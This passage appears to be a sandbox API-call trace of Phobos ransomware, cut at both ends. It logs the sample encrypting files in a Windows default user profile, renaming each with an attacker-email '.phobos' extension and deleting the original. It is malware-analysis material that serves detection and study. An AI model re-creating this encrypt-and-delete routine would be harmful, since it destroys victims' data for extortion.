lpFileSize=0x2c9fbf0*=467) returned 1 [0211.909] CloseHandle (hObject=0x10c) returned 1 [0211.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk")) returned 0x20 [0211.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.910] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.910] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.910] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.910] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1d3, lpOverlapped=0x0) returned 1 [0211.911] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1e0) returned 1 [0211.911] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1e0, lpOverlapped=0x0) returned 1 [0211.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0211.912] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.912] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0211.912] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.912] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0211.912] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.912] CloseHandle (hObject=0x10c) returned 1 [0211.912] CloseHandle (hObject=0x178) returned 1 [0211.912] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk")) returned 1 [0211.913] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.914] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=894) returned 1 [0211.914] CloseHandle (hObject=0x178) returned 1 [0211.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk")) returned 0x20 [0211.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\downloads.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.914] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.914] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\links\\downloads.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.914] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.915] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x37e, lpOverlapped=0x0) returned 1 [0211.972] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x380, dwBufLen=0x380 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x380) returned 1 [0211.972] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x380, lpOverlapped=0x0) returned 1 [0211.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.973] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.973] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0211.973] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.973] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0211.973] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.973] CloseHandle (hObject=0x178) returned 1 [0211.973] CloseHandle (hObject=0x10c) returned 1 [0211.973] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk")) returned 1 [0211.974] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.975] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0211.975] CloseHandle (hObject=0x10c) returned 1 [0211.975] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.976] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=65536) returned 1 [0211.976] CloseHandle (hObject=0x10c) returned 1 [0211.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf")) returned 0x26 [0211.976] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.976] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.976] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.977] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.977] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.977] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10000, lpOverlapped=0x0) returned 1 [0211.989] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010, dwBufLen=0x10010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10010) returned 1 [0211.989] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10010, lpOverlapped=0x0) returned 1 [0211.991] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0211.991] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.991] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0211.991] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.991] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x142, lpOverlapped=0x0) returned 1 [0211.991] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.991] CloseHandle (hObject=0x10c) returned 1 [0211.991] CloseHandle (hObject=0x178) returned 1 [0211.991] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf")) returned 1 [0211.993] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.993] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=524288) returned 1 [0211.993] CloseHandle (hObject=0x178) returned 1 [0211.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x26 [0211.993] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0211.994] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.994] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0211.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.994] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0211.994] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.994] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x80000, lpOverlapped=0x0) returned 1 [0212.172] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010, dwBufLen=0x80010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80010) returned 1 [0212.175] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x80010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x80010, lpOverlapped=0x0) returned 1 [0212.183] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0212.183] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.183] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe0, dwBufLen=0xe0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe0) returned 1 [0212.183] CryptDestroyKey (hKey=0xa32a28) returned 1 [0212.183] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x192, lpOverlapped=0x0) returned 1 [0212.183] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.183] CloseHandle (hObject=0x178) returned 1 [0212.183] CloseHandle (hObject=0x10c) returned 1 [0212.183] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms")) returned 1 [0212.187] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0212.188] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=248) returned 1 [0212.188] CloseHandle (hObject=0x10c) returned 1 [0212.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms")) returned 0x23 [0212.188] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms", dwFileAttributes=0x22) returned 1 [0212.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0212.188] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.188] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.189] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0212.189] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.189] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf8, lpOverlapped=0x0) returned 1 [0212.190] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0212.190] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0212.191] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0212.191] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.191] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0212.191] CryptDestroyKey (hKey=0xa32a28) returned 1 [0212.191] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0212.191] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.191] CloseHandle (hObject=0x10c) returned 1 [0212.191] CloseHandle (hObject=0x178) returned 1 [0212.191] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms")) returned 1 [0212.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos", dwFileAttributes=0x23) returned 1 [0212.192] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.192] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=248) returned 1 [0212.192] CloseHandle (hObject=0x178) returned 1 [0212.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms")) returned 0x23 [0212.193] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x22) returned 1 [0212.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.193] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.193] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0212.193] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, 